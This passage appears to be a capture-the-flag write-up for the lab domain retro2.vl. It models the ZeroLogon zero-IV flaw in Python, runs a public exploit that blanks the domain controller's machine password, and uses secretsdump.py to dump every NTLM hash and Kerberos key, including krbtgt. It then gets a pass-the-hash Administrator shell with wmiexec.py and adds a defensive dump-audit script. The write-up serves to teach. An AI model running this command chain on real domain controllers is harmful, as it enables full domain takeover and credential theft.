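        c = p ^ keystream_byte
        out.append(c)
        reg = reg[1:] + bytes([c])
    return bytes(out)


def zero_credential_validates(key: bytes, iv: bytes = bytes(BLOCK)) -> bool:
    """Model of the vulnerable check: does an all-zero client credential
    match the credential computed from an all-zero client challenge?"""
    return cfb8_encrypt(key, iv, bytes(CREDENTIAL_LEN)) == bytes(CREDENTIAL_LEN)


def fraction_of_weak_keys(trials: int = 20000) -> float:
    """Share of session keys (deterministic sequence, so repeatable) for
    which the zero credential is accepted under the fixed zero IV."""
    hits = sum(zero_credential_validates(i.to_bytes(BLOCK, "big"))
               for i in range(trials))
    return hits / trials


def fraction_with_random_iv(trials: int = 5000) -> float:
    """Same test, but with a per-session IV derived from the trial number
    (standing in for a random IV): the all-zero output now needs eight
    independent keystream bytes to be zero, about 2**-64."""
    hits = 0
    for i in range(trials):
        key = i.to_bytes(BLOCK, "big")
        iv = hashlib.sha256(b"iv" + key).digest()[:BLOCK]
        hits += zero_credential_validates(key, iv)
    return hits / trials


def find_weak_key() -> bytes:
    """First key in the deterministic sequence that accepts the zero
    credential; on average about 256 tries, matching the post's figure."""
    i = 0
    while not zero_credential_validates(i.to_bytes(BLOCK, "big")):
        i += 1
    return i.to_bytes(BLOCK, "big")


if __name__ == "__main__":
    k = find_weak_key()
    print("weak key index:", int.from_bytes(k, "big"))
    print("zero IV, weak-key fraction:", fraction_of_weak_keys())
    print("random IV, weak-key fraction:", fraction_with_random_iv())
```

The two fractions are the whole story: a fixed zero IV turns a 2^-64 event into a 2^-8 one, and because the attacker picks the challenge, each failed attempt just means a fresh session key and another 1-in-256 roll. Detection on the wire is a burst of NetrServerReqChallenge/NetrServerAuthenticate3 calls from one source; the vendor fix enforces secure RPC so the unsigned, unsealed path the attack needs is refused.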

Exploit

This exploit can be executed pre-authentication, remotely. I’ll grab a POC here, and add the requirements with uv:

oxdf@hacky$ uv add --script cve-2020-1472-exploit.py impacket
Updated `cve-2020-1472-exploit.py`
oxdf@hacky$ uv run --script cve-2020-1472-exploit.py 
Installed 21 packages in 40ms
Usage: zerologon_tester.py <dc-name> <dc-ip>

Tests whether a domain controller is vulnerable to the Zerologon attack. Resets the DC account password to an empty string when vulnerable.
Note: dc-name should be the (NetBIOS) computer name of the domain controller.

Now I give it the DC name and the IP:

oxdf@hacky$ uv run --script cve-2020-1472-exploit.py bln01 10.129.234.168
Performing authentication attempts...
============================================================================================================================================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

With the machine account password set to an empty string, I can DCSync:

oxdf@hacky$ secretsdump.py -just-dc -no-pass 'bln01$@10.129.234.168'
/home/oxdf/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c06552bdb50ada21a7c74536c231b848:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e242a90fb9503f383255a4328e75756:::
admin:1000:aad3b435b51404eeaad3b435b51404ee:49c31c8f60320b9f416bc248231c008c:::
Julie.Martin:1105:aad3b435b51404eeaad3b435b51404ee:cf4999af837f40d72d1c5bcec27ba9b6:::
Clare.Smith:1106:aad3b435b51404eeaad3b435b51404ee:a7c82ec08414f0c54637fad20b9aac9e:::
Laura.Davies:1107:aad3b435b51404eeaad3b435b51404ee:ee74607fad6d8c51b0d488e322f82317:::
Rhys.Richards:1108:aad3b435b51404eeaad3b435b51404ee:09377f210fdbdcda6f97eda91ddc6879:::
Leah.Robinson:1109:aad3b435b51404eeaad3b435b51404ee:6333c620221c04d8fb5b6d7ca8b6d6d7:::
Michelle.Bird:1110:aad3b435b51404eeaad3b435b51404ee:c823220a9bda3ca70ebe7362187c9004:::
Kayleigh.Stephenson:1111:aad3b435b51404eeaad3b435b51404ee:a78835f0139b3b206f9598fe9c18d707:::
Charles.Singh:1112:aad3b435b51404eeaad3b435b51404ee:432119e62a10aff8c8200e4f45e772a0:::
Sam.Humphreys:1113:aad3b435b51404eeaad3b435b51404ee:3c1508fc774de1e6040c68b41a17fdee:::
Margaret.Austin:1114:aad3b435b51404eeaad3b435b51404ee:c6ebda46b0b014eda3ffcb8d92d179d9:::
Caroline.James:1115:aad3b435b51404eeaad3b435b51404ee:80835fee4ce88524f63a0ecf60870ac0:::
Lynda.Giles:1116:aad3b435b51404eeaad3b435b51404ee:dbf17856bd378ec410c20b98a749571f:::
Emily.Price:1117:aad3b435b51404eeaad3b435b51404ee:9cdf1d59674a6ddfedef2ae2545d3862:::
Lynne.Dennis:1118:aad3b435b51404eeaad3b435b51404ee:4b690295089b91881633113f13c866ee:::
Alexandra.Black:1119:aad3b435b51404eeaad3b435b51404ee:3349f04c2fdcf796a66c37b2a7658ae6:::
Alex.Scott:1120:aad3b435b51404eeaad3b435b51404ee:200155446e3b3817e8bc857dfe01b58c:::
Mandy.Davies:1121:aad3b435b51404eeaad3b435b51404ee:c144842c62c3051b8f1b8467ec62ef1f:::
Marilyn.Whitehouse:1122:aad3b435b51404eeaad3b435b51404ee:097b5b5b97e2a3b07db0b3deac5cd303:::
Lindsey.Harrison:1123:aad3b435b51404eeaad3b435b51404ee:261b8b9c79b19345e8ea15dcdfc03ecd:::
Sally.Davey:1124:aad3b435b51404eeaad3b435b51404ee:78ac830ac29ae1df8fa569b39515d5a5:::
retro2.vl\inventory:1128:aad3b435b51404eeaad3b435b51404ee:46b019644dde01251e7044a3d4185bd1:::
retro2.vl\ldapreader:1130:aad3b435b51404eeaad3b435b51404ee:fe63aaefd1cfd29d7cc5c14321a725f3:::
BLN01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ADMWS01$:1127:aad3b435b51404eeaad3b435b51404ee:a5c0bab5dbb71d3f8b7b42b599108fbb:::
FS01$:1131:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
FS02$:1132:aad3b435b51404eeaad3b435b51404ee:eb354224f433cd7cd824b1fdce8c0795:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:1de3d3d429521d8d99e4b4b31da5ce5f993902a8876adaabdd9449a5256c220f
krbtgt:aes128-cts-hmac-sha1-96:8250eee9083a48b1fca675d7d0ce3699
krbtgt:des-cbc-md5:d334438313291520
admin:aes256-cts-hmac-sha1-96:055842e1ada4e1cba5bd0286a4fa9de9337b0324104adc533aabea23ddc353b7
admin:aes128-cts-hmac-sha1-96:1e0f4d9eb0ea70d225db67d53f297934
admin:des-cbc-md5:70d0624397c708df
Julie.Martin:aes256-cts-hmac-sha1-96:5428f080b3303d74da2a344d0b799d97dfb5795fee1d1ed64b3e7e9cc3cbec5c
Julie.Martin:aes128-cts-hmac-sha1-96:8757cfac9fd8af791bd8f5c9b8bfac0c
Julie.Martin:des-cbc-md5:0e85dca2e3e6291a
Clare.Smith:aes256-cts-hmac-sha1-96:65c7c8d4e980f1e63fab4af0fb8b8dc17e9bddff20e7b8bb5fa5c1690561f406
Clare.Smith:aes128-cts-hmac-sha1-96:54cc3c8caadcd6e9b605d2da4c96e55f
Clare.Smith:des-cbc-md5:61fe8f52b39ecb9d
Laura.Davies:aes256-cts-hmac-sha1-96:9ada131aebb330b859770d3177e4b6bf2e37e994d83761e83c296e3dd0549fa4
Laura.Davies:aes128-cts-hmac-sha1-96:c00363c7acdb7e6efb47e90c46eb73f5
Laura.Davies:des-cbc-md5:31d670ec9b16c762
Rhys.Richards:aes256-cts-hmac-sha1-96:805f8d2f3f6c92cbf7bf0fc2449ec03ac8446b0f595aeb68d5e34932bdf1f9a8
Rhys.Richards:aes128-cts-hmac-sha1-96:baeaf7d174ea76419d381e545935aef2
Rhys.Richards:des-cbc-md5:6b0e2cf7ae3de3e3
Leah.Robinson:aes256-cts-hmac-sha1-96:90848db193370cc832b199b27137ef581b78eddc2d5f635a0e01e0b1c514c326
Leah.Robinson:aes128-cts-hmac-sha1-96:6aa30b143db0f0e65517bb062a4fe6c7
Leah.Robinson:des-cbc-md5:d9b6abe30e851f9b
Michelle.Bird:aes256-cts-hmac-sha1-96:a76108bec6385a4469d5eff1d4d5ccaaf066b981d56d3df82f058c1b66b9c653
Michelle.Bird:aes128-cts-hmac-sha1-96:ca9fdc76c484d05397433e90c2d9b84c
Michelle.Bird:des-cbc-md5:79b016e69ec4b59b
Kayleigh.Stephenson:aes256-cts-hmac-sha1-96:6c11e6b4e5e263bbb7b6859b7e4380bf9fce222de2e51da9f033c370d1bd3b34
Kayleigh.Stephenson:aes128-cts-hmac-sha1-96:69ced3d12c16659ae2fdaa2bab6df2f3
Kayleigh.Stephenson:des-cbc-md5:ce7ae949452a1997
Charles.Singh:aes256-cts-hmac-sha1-96:0eb1f6abc867ac77603b9b6f8b454abfef421c6eec2518e28e0e40ee3efb6215
Charles.Singh:aes128-cts-hmac-sha1-96:3cee7675dd2615a5214127faacb30930
Charles.Singh:des-cbc-md5:9125dcd6d3ad4fb6
Sam.Humphreys:aes256-cts-hmac-sha1-96:878ea36ddce6a9e5b050021e757669ff94b8b3367bcb9461dc83cdbcc1342b77
Sam.Humphreys:aes128-cts-hmac-sha1-96:102e420c74d34cda602282342c555b72
Sam.Humphreys:des-cbc-md5:5b5bc1a8683816c4
Margaret.Austin:aes256-cts-hmac-sha1-96:500b6f66a68c384b76ee63fb2d309278638c4eaa2903a7555b7f0a63ed2da30e
Margaret.Austin:aes128-cts-hmac-sha1-96:2bb2066bea0481bf7c9fae65a908bb64
Margaret.Austin:des-cbc-md5:077f91679bcb6dda
Caroline.James:aes256-cts-hmac-sha1-96:0ddabfe9574396df083878375b0e7100c4466698a1d0fa812a07b0bc17f44583
Caroline.James:aes128-cts-hmac-sha1-96:574766e01691af43749a8c0cc566af0f
Caroline.James:des-cbc-md5:29574998cd13f813
Lynda.Giles:aes256-cts-hmac-sha1-96:dc9ca6bdfd27960e9c5700864e0fec0a388f903747d79c61d773cc6e24ea2253
Lynda.Giles:aes128-cts-hmac-sha1-96:c2eaf2f31cb78d18ac51c1c8b0cd496d
Lynda.Giles:des-cbc-md5:62b9082f6e1ab92a
Emily.Price:aes256-cts-hmac-sha1-96:37d0c3e846f44b0c0afe005b178c1e2689ab8cf227c60345e4d83af3bedcd908
Emily.Price:aes128-cts-hmac-sha1-96:87331a1b619dc0b817a00bd7882973b3
Emily.Price:des-cbc-md5:d592c7dce0386489
Lynne.Dennis:aes256-cts-hmac-sha1-96:ec46f167dac2f0763fa4891b4ec7204e8b791b6e757b88f13eaf0a3069d91520
Lynne.Dennis:aes128-cts-hmac-sha1-96:a6de42302e21936f728c6340cc3924b4
Lynne.Dennis:des-cbc-md5:2337fe088083d561
Alexandra.Black:aes256-cts-hmac-sha1-96:63e7bcd8c3827fafac984927c8ee7a410644603b87df03a73d93a5d83d351199
Alexandra.Black:aes128-cts-hmac-sha1-96:f7f77113ff7a8e070f8d961a973afa80
Alexandra.Black:des-cbc-md5:70dcdcef4a584c67
Alex.Scott:aes256-cts-hmac-sha1-96:56e28035bf0e773b08eac63f2ded3b77150f4662335fecfe0d167439954c3c6c
Alex.Scott:aes128-cts-hmac-sha1-96:1743a9bfda5a6d4937e10833aa94261a
Alex.Scott:des-cbc-md5:c47a9e6475452f7c
Mandy.Davies:aes256-cts-hmac-sha1-96:f9ab0b0127d819088c6e20f2a22b62e658e65413634a982e7a03029860b5fbbb
Mandy.Davies:aes128-cts-hmac-sha1-96:775c402ad1b82a01d00d24cdce2f0cff
Mandy.Davies:des-cbc-md5:0dcb62cd49a4070b
Marilyn.Whitehouse:aes256-cts-hmac-sha1-96:070d0ec84b01cee1f4e6f7fde70978e38dd06e9718d29165f7b34687f2bfc57d
Marilyn.Whitehouse:aes128-cts-hmac-sha1-96:983446f761745cac59cfdf6533be1e62
Marilyn.Whitehouse:des-cbc-md5:b34fad80d6583d52
Lindsey.Harrison:aes256-cts-hmac-sha1-96:df8a640121c7931e4b1e24a903831bbdb2ceca342bc32df0d642be5ad59aebaa
Lindsey.Harrison:aes128-cts-hmac-sha1-96:9c0600e456143cb3a958434295e230c5
Lindsey.Harrison:des-cbc-md5:df4afde6a83d586d
Sally.Davey:aes256-cts-hmac-sha1-96:ad994860516e89a93515d9934fbc92ae0e18ac10a4179ce0b5e856d21239c07d
Sally.Davey:aes128-cts-hmac-sha1-96:1bd25ea0251be749c0b9ff10c0443728
Sally.Davey:des-cbc-md5:8940a2cde9fb45f1
retro2.vl\inventory:aes256-cts-hmac-sha1-96:251d2610ccb122fbefecbc0bad2a0f1ecffe39e48734d40fc31f9d6c32d9c3a6
retro2.vl\inventory:aes128-cts-hmac-sha1-96:6a4787b610d341b0d99758c8dd80a405
retro2.vl\inventory:des-cbc-md5:ad08041f6b0861a7
retro2.vl\ldapreader:aes256-cts-hmac-sha1-96:1f38605e159b9f10ba465530aa4ea2d9fd5429b3bf348fa8559b5acc647c0b32
retro2.vl\ldapreader:aes128-cts-hmac-sha1-96:000256e0522cc3cd2f52c6bfe1698368
retro2.vl\ldapreader:des-cbc-md5:8908762379fdfdae
BLN01$:aes256-cts-hmac-sha1-96:ffd22246332c76f0831bbae3acbcf7d9160e780f77ecbf6322ec536b8744a280
BLN01$:aes128-cts-hmac-sha1-96:00489881457ca7f5ba4dac2e1395fd44
BLN01$:des-cbc-md5:0886138c15a70157
ADMWS01$:aes256-cts-hmac-sha1-96:77bc7578e4acc75c4f357c41584310ab8c659768200785b0a02db6056fe1d2cd
ADMWS01$:aes128-cts-hmac-sha1-96:e8e055a2f04a9c23a608f9e7f5676b2b
ADMWS01$:des-cbc-md5:32efae925d46310b
FS01$:aes256-cts-hmac-sha1-96:c2d3478014ac16cda2a093ffa710f57939ea47c022aa0bd4cec840b2fc313b42
FS01$:aes128-cts-hmac-sha1-96:260e51b22e8694ed4c8d229bb3f18aeb
FS01$:des-cbc-md5:85df2686e95bdf92
FS02$:aes256-cts-hmac-sha1-96:fcceafa1335a9e262a1e4532d516011d4e8b80ae7f35fb35714a2a6410db18bc
FS02$:aes128-cts-hmac-sha1-96:5f2c27f494ab454d875057c909790e3e
FS02$:des-cbc-md5:252afd385b04b0bf
[*] Cleaning up...
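The dump above is in secretsdump.py's output format, and it carries a detail worth catching in an audit: the NT hash shown for BLN01$ (31d6cfe0d16ae931b73c59d7e0c089c0) is the well-known hash of an empty password, which is the state a ZeroLogon password reset leaves a domain controller in. The following script is an added example, mine rather than code from the writeup or from Impacket: it parses the `user:rid:lmhash:nthash:::` lines of a dump, skips banners and Kerberos key lines, and reports empty-password accounts, machine accounts in that state, accounts still storing an LM hash, and accounts sharing one NT hash. The sample dump inside it is constructed for the example (only the BLN01$ line repeats the value from the page).

```python
"""Audit a secretsdump-style NTDS dump for weak-credential indicators.

Added example; not part of the original writeup and not Impacket's own code.
The sample dump at the bottom is constructed for this example.
"""
import re
from collections import defaultdict
from typing import Dict, List

# NT hash (MD4 over UTF-16LE) of the empty string: an account with this
# value has an empty password.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM hash of the empty string. Domains that no longer store LM hashes show
# this value for every account, so any other LM value is a legacy finding.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# One NTLM line from secretsdump: [domain\]user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_dump(text: str) -> List[dict]:
    """Return one record per NTLM hash line; every other line is ignored."""
    records = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m is None:
            continue  # banner, Kerberos key line, or other non-hash output
        records.append({
            "user": m.group("user"),
            "rid": int(m.group("rid")),
            "lm": m.group("lm").lower(),
            "nt": m.group("nt").lower(),
        })
    return records


def audit(text: str) -> Dict[str, object]:
    """Group the parsed records into the findings a reviewer would act on."""
    records = parse_dump(text)
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    return {
        # Any account with an empty password. Guest commonly shows this while
        # disabled, so confirm the account's status before raising it.
        "empty_password": [r["user"] for r in records if r["nt"] == EMPTY_NT_HASH],
        # A machine account with an empty password. On a domain controller this
        # is what a ZeroLogon reset leaves behind and needs repairing.
        "machine_empty_password": [
            r["user"] for r in records
            if r["user"].endswith("$") and r["nt"] == EMPTY_NT_HASH
        ],
        # LM hashes still stored: weak, case-insensitive 14-character scheme.
        "lm_hash_stored": [r["user"] for r in records if r["lm"] != EMPTY_LM_HASH],
        # Distinct accounts sharing an NT hash share a password.
        "shared_nt_hash": {
            nt: users for nt, users in by_nt.items()
            if len(users) > 1 and nt != EMPTY_NT_HASH
        },
    }


# Constructed sample in secretsdump's output format (not a real dump). Only
# the BLN01$ line reproduces a value from the writeup; the rest is made up.
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
retro2.vl\svc_old:1200:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
BLN01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
FS01$:1131:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
legacy.user:1300:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
[*] Cleaning up...
"""

if __name__ == "__main__":
    for finding, hits in audit(SAMPLE_DUMP).items():
        print(f"{finding}: {hits}")
```

Run it against a saved dump with `audit(open("dump.txt").read())`. The pre-Windows 2000 computer default (the lowercase machine name as the password) would be caught the same way by comparing each `$` account's NT hash against the MD4 of that string, but Python's hashlib no longer guarantees MD4 is available, so that check needs a separate MD4 implementation and is left out here.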

Shell

With the administrator hash, I can get a shell as Administrator using wmiexec.py from Impacket:

oxdf@hacky$ wmiexec.py -hashes :c06552bdb50ada21a7c74536c231b848 retro2.vl/administrator@bln01.retro2.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
retro2\administrator